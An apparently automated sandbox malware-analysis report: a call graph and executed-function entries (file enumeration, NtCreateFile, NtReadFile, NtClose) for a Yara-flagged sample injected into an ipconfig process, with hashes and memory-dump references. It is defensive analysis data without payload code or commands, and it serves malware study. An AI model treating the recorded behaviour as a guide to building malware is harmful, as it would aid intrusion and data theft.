2f2b4b0 84184->84208 84187 2f2b905 84185->84187 84188 2f2b9af 84185->84188 84189 2f38710 2 API calls 84187->84189 84192 2f29e90 LdrLoadDll 84188->84192 84190 2f2b90f 84189->84190 84194 2f29e90 LdrLoadDll 84190->84194 84191 2f38710 2 API calls 84191->84177 84192->84181 84193 2f2b9f9 84193->84191 84195 2f2b933 84194->84195 84196 2f2b400 2 API calls 84195->84196 84197 2f2b949 84196->84197 84198 2f38710 2 API calls 84197->84198 84199 2f2b953 84198->84199 84200 2f29e90 LdrLoadDll 84199->84200 84201 2f2b977 84200->84201 84202 2f2b400 2 API calls 84201->84202 84203 2f2b98d 84202->84203 84204 2f2b4b0 2 API calls 84203->84204 84205 2f2b99d 84204->84205 84206 2f38710 2 API calls 84205->84206 84207 2f2b9a7 84206->84207 84207->84111 84209 2f2b4d4 84208->84209 84212 2f38360 84209->84212 84213 2f391e0 LdrLoadDll 84212->84213 84214 2f3837c 84213->84214 84217 3a52fb0 LdrInitializeThunk 84214->84217 84215 2f2b55b 84215->84193 84217->84215 84219 2f32d88 84218->84219 84220 2f29e90 LdrLoadDll 84219->84220 84221 2f32db7 84220->84221 84222 2f2b340 3 API calls 84221->84222 84224 2f32dea 84222->84224 84223 2f32df1 84223->84120 84224->84223 84225 2f29e90 LdrLoadDll 84224->84225 84226 2f32e19 84225->84226 84227 2f29e90 LdrLoadDll 84226->84227 84228 2f32e3d 84227->84228 84229 2f2b400 2 API calls 84228->84229 84230 2f32e61 84229->84230 84231 2f32ea3 84230->84231 84419 2f326c0 84230->84419 84234 2f29e90 LdrLoadDll 84231->84234 84233 2f32e7a 84235 2f33026 84233->84235 84423 2f32ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 84233->84423 84236 2f32ec3 84234->84236 84235->84120 84238 2f2b400 2 API calls 84236->84238 84239 2f32ee7 84238->84239 84240 2f32f2d 84239->84240 84242 2f32f04 84239->84242 84244 2f326c0 8 API calls 84239->84244 84241 2f2b400 2 API calls 84240->84241 84243 2f32f5d 84241->84243 84242->84235 84424 2f32ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 84242->84424 84246 2f32fa3 84243->84246 84247 2f32f7a 84243->84247 84248 2f326c0 8 API calls 84243->84248 84244->84242 84250 2f2b400 2 API calls 84246->84250 84247->84235 84425 2f32ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 84247->84425 84248->84247 84251 2f33002 84250->84251 84252 2f3304b 84251->84252 84253 2f3301f 84251->84253 84254 2f326c0 8 API calls 84251->84254 84252->84120 84253->84235 84426 2f32ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 84253->84426 84254->84253 84257 2f31ab4 84256->84257 84258 2f29e90 LdrLoadDll 84257->84258 84259 2f31b81 84258->84259 84260 2f2b340 3 API calls 84259->84260 84262 2f31bb4 84260->84262 84261 2f31bbb 84261->84122 84262->84261 84263 2f29e90 LdrLoadDll 84262->84263 84264 2f31be3 84263->84264 84265 2f2b400 2 API calls 84264->84265 84266 2f31c23 84265->84266 84267 2f31d43 84266->84267 84268 2f326c0 8 API calls 84266->84268 84267->84122 84269 2f31c40 84268->84269 84270 2f31d52 84269->84270 84427 2f31870 84269->84427 84271 2f38710 2 API calls 84270->84271 84274 2f31d5c 84271->84274 84273 2f31c58 84273->84270 84275 2f31c63 84273->84275 84274->84122 84276 2f3a270 2 API calls 84275->84276 84277 2f31c8c 84276->84277 84278 2f31c95 84277->84278 84279 2f31cab 84277->84279 84280 2f38710 2 API calls 84278->84280 84456 2f31760 CoInitialize 84279->84456 84282 2f31c9f 84280->84282 84282->84122 84283 2f31cb9 84458 2f38420 84283->84458 84285 2f31d32 84286 2f38710 2 API calls 84285->84286 84288 2f31d3c 84286->84288 84290 2f3a0a0 2 API calls 84288->84290 84289 2f31cd7 84289->84285 84291 2f38420 LdrLoadDll 84289->84291 84462 2f31690 LdrLoadDll RtlFreeHeap 84289->84462 84290->84267 84291->84289 84293 2f2ed28 84292->84293 84294 2f3a270 2 API calls 84293->84294 84296 2f2ed88 84294->84296 84295 2f2ed91 84295->84124 84296->84295 84463 2f2e9c0 84296->84463 84298 2f2edb8 84299 2f2edd6 84298->84299 84498 2f307c0 10 API calls 84298->84498 84304 2f2edf0 84299->84304 84500 2f29c90 LdrLoadDll 84299->84500 84301 2f2edca 84499 2f307c0 10 API calls 84301->84499 84305 2f2e9c0 9 API calls 84304->84305 84306 2f2ee1b 84305->84306 84307 2f2ee3a 84306->84307 84501 2f307c0 10 API calls 84306->84501 84309 2f2ee54 84307->84309 84503 2f29c90 LdrLoadDll 84307->84503 84310 2f3a0a0 2 API calls 84309->84310 84313 2f2ee5e 84310->84313 84311 2f2ee2e 84502 2f307c0 10 API calls 84311->84502 84313->84124 84316 2f30bf6 84315->84316 84317 2f30c08 84316->84317 84318 2f30c8e 84316->84318 84320 2f29e90 LdrLoadDll 84317->84320 84319 2f30c6c 84318->84319 84521 2f31d90 84318->84521 84325 2f30c86 84319->84325 84526 2f36b60 84319->84526 84323 2f30c19 84320->84323 84324 2f30c37 84323->84324 84326 2f29e90 LdrLoadDll 84323->84326 84328 2f29e90 LdrLoadDll 84324->84328 84325->84126 84326->84324 84327 2f30d20 84327->84126 84330 2f30c5b 84328->84330 84329 2f30ccb 84329->84327 84331 2f30cea 84329->84331 84332 2f30d2c 84329->84332 84334 2f33a50 8 API calls 84330->84334 84335 2f30cf2 84331->84335 84336 2f30d0f 84331->84336 84333 2f29e90 LdrLoadDll 84332->84333 84337 2f30d3d 84333->84337 84334->84319 84338 2f3a0a0 2 API calls 84335->84338 84339 2f3a0a0 2 API calls 84336->84339 84552 2f30000 84337->84552 84340 2f30d03 84338->84340 84339->84327 84340->84126 84342 2f30e3f 84343 2f3a0a0 2 API calls 84342->84343 84344 2f30e46 84343->84344 84344->84126 84345 2f30d57 84345->84342 84558 2f306f0 8 API calls 84345->84558 84348 2f30bd0 10 API calls 84347->84348 84349 2f2cd9b 84348->84349 84350 2f2fbc0 84349->84350 84351 2f2fbe2 84350->84351 84352 2f29e90 LdrLoadDll 84351->84352 84353 2f2fdad 84352->84353 84354 2f29e90 LdrLoadDll 84353->84354 84355 2f2fdbe 84354->84355 84356 2f29d60 LdrLoadDll 84355->84356 84357 2f2fdd5 84356->84357 84560 2f2fa90 84357->84560 84360 2f2fa90 11 API calls 84361 2f2fe4b 84360->84361 84362 2f2fa90 11 API calls 84361->84362 84363 2f2fe63 84362->84363 84364 2f2fa90 11 API calls 84363->84364 84365 2f2fe7b 84364->84365 84366 2f2fa90 11 API calls 84365->84366 84367 2f2fe93 84366->84367 84368 2f2fa90 11 API calls 84367->84368 84370 2f2feae 84368->84370 84369 2f2fec8 84369->84130 84370->84369 84371 2f2fa90 11 API calls 84370->84371 84372 2f2fefc 84371->84372 84373 2f2fa90 11 API calls 84372->84373 84374 2f2ff39 84373->84374 84375 2f2fa90 11 API calls 84374->84375 84376 2f2ff76 84375->84376 84377 2f2fa90 11 API calls 84376->84377 84378 2f2ffb3 84377->84378 84379 2f2fa90 11 API calls 84378->84379 84380 2f2fff0 84379->84380 84380->84130 84382 2f323fd 84381->84382 84383 2f29b40 LdrLoadDll 84382->84383 84384 2f32418 84383->84384 84385 2f33e50 LdrLoadDll 84384->84385 84404 2f325e6 84384->84404 84386 2f32442 84385->84386 84387 2f33e50 LdrLoadDll 84386->84387 84388 2f32455 84387->84388 84389 2f33e50 LdrLoadDll 84388->84389 84390 2f32468 84389->84390 84391 2f33e50 LdrLoadDll 84390->84391 84392 2f3247b 84391->84392 84393 2f33e50 LdrLoadDll 84392->84393 84394 2f32491 84393->84394 84395 2f33e50 LdrLoadDll 84394->84395 84396 2f324a4 84395->84396 84397 2f33e50 LdrLoadDll 84396->84397 84398 2f324b7 84397->84398 84399 2f33e50 LdrLoadDll 84398->84399 84400 2f324ca 84399->84400 84401 2f33e50 LdrLoadDll 84400->84401 84402 2f324df 84401->84402 84403 2f326c0 8 API calls 84402->84403 84402->84404 84406 2f32561 84403->84406 84404->84132 84406->84404 84575 2f31fa0 LdrLoadDll 84406->84575 84408 2f2d783 84407->84408 84576 2f30130 84408->84576 84410 2f2d7a6 84411 2f2d7e4 84410->84411 84585 2f2d5d0 84410->84585 84413 2f31d90 8 API calls 84411->84413 84414 2f2d807 84413->84414 84415 2f2d5d0 8 API calls 84414->84415 84416 2f2d845 84414->84416 84415->84416 84417 2f2d5d0 8 API calls 84416->84417 84418 2f2cdcb 84417->84418 84418->83905 84420 2f3273d 84419->84420 84421 2f33a50 8 API calls 84420->84421 84422 2f328b9 84420->84422 84421->84422 84422->84233 84423->84231 84424->84240 84425->84246 84426->84252 84428 2f3188c 84427->84428 84429 2f29b40 LdrLoadDll 84428->84429 84430 2f318a7 84429->84430 84431 2f318b0 84430->84431 84432 2f33e50 LdrLoadDll 84430->84432 84431->84273 84433 2f318c7 84432->84433 84434 2f33e50 LdrLoadDll 84433->84434 84435 2f318dc 84434->84435 84436 2f33e50 LdrLoadDll 84435->84436 84437 2f318ef 84436->84437 84438 2f33e50 LdrLoadDll 84437->84438 84439 2f31902 84438->84439 84440 2f33e50 LdrLoadDll 84439->84440 84441 2f31918 84440->84441 84442 2f33e50 LdrLoadDll 84441->84442 84443 2f3192b 84442->84443 84444 2f29b40 LdrLoadDll 84443->84444 84445 2f31954 84444->84445 84446 2f33e50 LdrLoadDll 84445->84446 84455 2f319f0 84445->84455 84447 2f31978 84446->84447 84448 2f29b40 LdrLoadDll 84447->84448 84449 2f319ad 84448->84449 84450 2f33e50 LdrLoadDll 84449->84450 84449->84455 84451 2f319ca 84450->84451 84452 2f33e50 LdrLoadDll 84451->84452 84453 2f319dd 84452->84453 84454 2f33e50 LdrLoadDll 84453->84454 84454->84455 84455->84273 84457 2f317c5 84456->84457 84457->84283 84459 2f3842e 84458->84459 84460 2f391e0 LdrLoadDll 84459->84460 84461 2f3843c 84460->84461 84461->84289 84462->84289 84464 2f2ea58 84463->84464 84465 2f29e90 LdrLoadDll 84464->84465 84466 2f2eaf6 84465->84466 84467 2f29e90 LdrLoadDll 84466->84467 84468 2f2eb11 84467->84468 84469 2f2b400 2 API calls 84468->84469 84470 2f2eb36 84469->84470 84471 2f2ecae 84470->84471 84516 2f383a0 LdrLoadDll 84470->84516 84473 2f2ecbf 84471->84473 84504 2f2db00 84471->84504 84473->84298 84474 2f2eb61 84476 2f2eca4 84474->84476 84478 2f2eb6c 84474->84478 84477 2f38710 2 API calls 84476->84477 84477->84471 84479 2f38710 2 API calls 84478->84479 84480 2f2ebaf 84479->84480 84517 2f3a340 LdrLoadDll 84480->84517 84482 2f2ebe8 84483 2f2ebef 84482->84483 84484 2f2b400 2 API calls 84482->84484 84483->84298 84485 2f2ec13 84484->84485 84485->84473 84518 2f383a0 LdrLoadDll 84485->84518 84487 2f2ec38 84488 2f2ec8b 84487->84488 84489 2f2ec3f 84487->84489 84490 2f38710 2 API calls 84488->84490 84491 2f38710 2 API calls 84489->84491 84492 2f2ec95 84490->84492 84493 2f2ec49 84491->84493 84492->84298 84519 2f2e130 LdrLoadDll 84493->84519 84495 2f2ec66 84495->84473 84520 2f2e740 8 API calls 84495->84520 84497 2f2ec7c 84497->84298 84498->84301 84499->84299 84500->84304 84501->84311 84502->84307 84503->84309 84505 2f2db25 84504->84505 84506 2f29e90 LdrLoadDll 84505->84506 84507 2f2dbe0 84506->84507 84508 2f29e90 LdrLoadDll 84507->84508 84509 2f2dc04 84508->84509 84510 2f33a50 8 API calls 84509->84510 84512 2f2dc57 84510->84512 84511 2f2dd11 84511->84473 84512->84511 84513 2f29e90 LdrLoadDll 84512->84513 84514 2f2dcbe 84513->84514 84515 2f33a50 8 API calls 84514->84515 84515->84511 84516->84474 84517->84482 84518->84487 84519->84495 84520->84497 84522 2f29e90 LdrLoadDll 84521->84522 84523 2f31dac 84522->84523 84524 2f31e65 84523->84524 84525 2f33a50 8 API calls 84523->84525 84524->84319 84525->84524 84527 2f36b6e 84526->84527 84528 2f36b75 84526->84528 84527->84329 84529 2f29b40 LdrLoadDll 84528->84529 84530 2f36ba0 84529->84530 84531 2f3a270 2 API calls 84530->84531 84550 2f36cf4 84530->84550 84532 2f36bb8 84531->84532 84532->84550 84559 2f301a0 LdrLoadDll 84532->84559 84534 2f36bd6 84535 2f33e50 LdrLoadDll 84534->84535 84536 2f36bec 84535->84536 84537 2f33e50 LdrLoadDll 84536->84537 84538 2f36c08 84537->84538 84539 2f33e50 LdrLoadDll 84538->84539 84540 2f36c24 84539->84540 84541 2f33e50 LdrLoadDll 84540->84541 84542 2f36c43 84541->84542 84543 2f33e50 LdrLoadDll 84542->84543 84544 2f36c5f 84543->84544 84545 2f33e50 LdrLoadDll 84544->84545 84546 2f36c7b 84545->84546 84547 2f33e50 LdrLoadDll 84546->84547 84548 2f36ca1 84547->84548 84549 2f3a0a0 2 API calls 84548->84549 84551 2f36ce4 84548->84551 84549->84550 84550->84329 84551->84329 84553 2f30026 84552->84553 84554 2f29e90 LdrLoadDll 84553->84554 84555 2f3005c 84554->84555 84556 2f2b730 10 API calls 84555->84556 84557 2f3011f 84556->84557 84557->84345 84558->84345 84559->84534 84561 2f2fab9 84560->84561 84562 2f33e50 LdrLoadDll 84561->84562 84563 2f2faf0 84562->84563 84564 2f33e50 LdrLoadDll 84563->84564 84565 2f2fb08 84564->84565 84566 2f33e50 LdrLoadDll 84565->84566 84568 2f2fb24 84566->84568 84567 2f2fbac 84567->84360 84568->84567 84569 2f2fb4e FindFirstFileW 84568->84569 84569->84567 84573 2f2fb69 84569->84573 84570 2f2fb93 FindNextFileW 84572 2f2fba5 FindClose 84570->84572 84570->84573 84572->84567 84573->84570 84574 2f2f970 11 API calls 84573->84574 84574->84573 84575->84406 84577 2f29e90 LdrLoadDll 84576->84577 84578 2f30146 84577->84578 84579 2f3015a 84578->84579 84580 2f29e90 LdrLoadDll 84578->84580 84581 2f29e90 LdrLoadDll 84579->84581 84580->84579 84582 2f30174 84581->84582 84583 2f33a50 8 API calls 84582->84583 84584 2f30188 84582->84584 84583->84584 84584->84410 84586 2f2d600 84585->84586 84587 2f2d715 84585->84587 84588 2f33a50 8 API calls 84586->84588 84587->84411 84589 2f2d618 84588->84589 84589->84587 84590 2f33a50 8 API calls 84589->84590 84591 2f2d648 84590->84591 84591->84587 84592 2f3a0a0 2 API calls 84591->84592 84592->84587 84594 2f2dd75 84593->84594 84595 2f33e50 LdrLoadDll 84594->84595 84596 2f2ddc0 84595->84596 84597 2f2e11f 84596->84597 84598 2f33a50 8 API calls 84596->84598 84597->84140 84599 2f2dddc 84598->84599 84599->84597 84600 2f38960 2 API calls 84599->84600 84601 2f2de12 84600->84601 84602 2f2e107 84601->84602 84603 2f3b380 3 API calls 84601->84603 84604 2f3a0a0 2 API calls 84602->84604 84605 2f2de31 84603->84605 84604->84597 84605->84602 84606 2f2df27 84605->84606 84607 2f38180 2 API calls 84605->84607 84644 2f2aba0 LdrLoadDll LdrInitializeThunk 84606->84644 84608 2f2deb1 84607->84608 84608->84606 84610 2f2deb9 84608->84610 84612 2f2df0d 84610->84612 84613 2f2dedc 84610->84613 84616 2f2aa90 2 API calls 84610->84616 84611 2f2df52 84611->84602 84615 2f2df87 84611->84615 84619 2f2aa90 2 API calls 84611->84619 84614 2f3a0a0 2 API calls 84612->84614 84617 2f38710 2 API calls 84613->84617 84618 2f2df1d 84614->84618 84645 2f2a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84615->84645 84616->84613 84621 2f2deec 84617->84621 84618->84140 84619->84615 84623 2f375b0 2 API calls 84621->84623 84622 2f2dfa9 84624 2f2e0e6 84622->84624 84625 2f2dfb7 84622->84625 84623->84612 84627 2f3a0a0 2 API calls 84624->84627 84646 2f38780 LdrLoadDll 84625->84646 84628 2f2e0fd 84627->84628 84628->84140 84629 2f2dfd6 84630 2f2d200 3 API calls 84629->84630 84631 2f2e03b 84630->84631 84631->84602 84632 2f2e046 84631->84632 84633 2f3a0a0 2 API calls 84632->84633 84634 2f2e06a 84633->84634 84647 2f382e0 LdrLoadDll 84634->84647 84636 2f2e07e 84637 2f38290 2 API calls 84636->84637 84638 2f2e0a5 84637->84638 84639 2f2e0ac 84638->84639 84648 2f382e0 LdrLoadDll 84638->84648 84639->84140 84641 2f2e0ce 84649 2f380a0 LdrLoadDll 84641->84649 84643 2f2e0dc 84643->84140 84644->84611 84645->84622 84646->84629 84647->84636 84648->84641 84649->84643 84651 2f2b59c 84650->84651 84652 2f2b400 2 API calls 84651->84652 84653 2f2b5e6 84652->84653 84654 2f2b688 84653->84654 84655 2f38420 LdrLoadDll 84653->84655 84654->84149 84658 2f2b60d 84655->84658 84656 2f2b67f 84657 2f38710 2 API calls 84656->84657 84657->84654 84658->84656 84659 2f2b694 84658->84659 84660 2f38420 LdrLoadDll 84658->84660 84661 2f38710 2 API calls 84659->84661 84660->84658 84662 2f2b69d 84661->84662 84663 2f2b400 2 API calls 84662->84663 84666 2f2b70c 84662->84666 84664 2f2b6b6 84663->84664 84665 2f33e50 LdrLoadDll 84664->84665 84664->84666 84665->84666 84666->84149

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 02F2FA89, Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F2FB5F
                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02F2FB9E
                                                                                                                                                      • FindClose.KERNELBASE(?), ref: 02F2FBA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
                                                                                                                                                      • Instruction ID: 93345e1fb943929ce854290a9bd039e7b7912c2795d782c2444ffe310714df9d
                                                                                                                                                      • Opcode Fuzzy Hash: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
                                                                                                                                                      • Instruction Fuzzy Hash: BA31E471A00319BBEB21DF60CC85FEB777DAF85745F144598BA49A7180D770EA88CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F2FA90, Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F2FB5F
                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02F2FB9E
                                                                                                                                                      • FindClose.KERNELBASE(?), ref: 02F2FBA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                                                                                      • Instruction ID: 29675574f3470d4259ec24996581b1cab3f92076dbbdac222706288053be1f44
                                                                                                                                                      • Opcode Fuzzy Hash: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                                                                                      • Instruction Fuzzy Hash: 6931E571900319BBDB21DF64CC85FEB73BDAF85745F144598BA08A7180D770AA888BA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F385E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F33BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F33BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F3862D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction ID: 568aa2b68a269e46d3d29e347f176c61db7465ebc6efcb509f9e1d418a4164b9
                                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction Fuzzy Hash: 08F0B2B2204208ABCB08DF88DC84EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F38690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(02F33D72,5E972F65,FFFFFFFF,02F33A31,?,?,02F33D72,?,02F33A31,FFFFFFFF,5E972F65,02F33D72,?,00000000), ref: 02F386D5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction ID: 35871bddecc153d6cc5a321b456532dcbd15875f4aca7f898af63ac59520507a
                                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction Fuzzy Hash: C0F0A4B2200208ABDB14DF89DC84EEB77ADAF8C754F158248BA1DA7241D630E911CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F3868D, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(02F33D72,5E972F65,FFFFFFFF,02F33A31,?,?,02F33D72,?,02F33A31,FFFFFFFF,5E972F65,02F33D72,?,00000000), ref: 02F386D5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                                                      • Instruction ID: 0af3709769f1564739efa8a75f808e5f565ffbce505f925db64c3427fb09fc4b
                                                                                                                                                      • Opcode Fuzzy Hash: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                                                      • Instruction Fuzzy Hash: 1BF017B6204048ABCB04DF98DC90CEB77ADBF8C354B158289FA1CA7201C630E855CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F3870A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(02F33D50,?,?,02F33D50,00000000,FFFFFFFF), ref: 02F38735
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                                                      • Instruction ID: 39374c3663f30c003aae6bbf6a2d2e517b90755272f91643e4656e6c5fa3b555
                                                                                                                                                      • Opcode Fuzzy Hash: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                                                      • Instruction Fuzzy Hash: 0AE08631600114AFD720DFA4CC86EDB7B6AEF44350F144159F909DB641C670E610CBD0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F38710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(02F33D50,?,?,02F33D50,00000000,FFFFFFFF), ref: 02F38735
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction ID: 82d108cc344752d89a90f5630f446cbe6b92a9fcf2481430ee53db860f898195
                                                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction Fuzzy Hash: ABD012756002146BD710EB98CC45E97775DEF44750F154455BA185B241C570F600C6E0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A534E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: fb9644fab67597318540532e10268945b3f3f47a663d49399846aa6543a1e709
                                                                                                                                                      • Instruction ID: 1ff741c2deff6ee47e5aaf10bd9c53b0bbd26b35940bd70878e35a17558e8594
                                                                                                                                                      • Opcode Fuzzy Hash: fb9644fab67597318540532e10268945b3f3f47a663d49399846aa6543a1e709
                                                                                                                                                      • Instruction Fuzzy Hash: 1890023160510802D540A5584614706100D8BD0245F61D816A1414568DC7A9895175B3
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52B80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
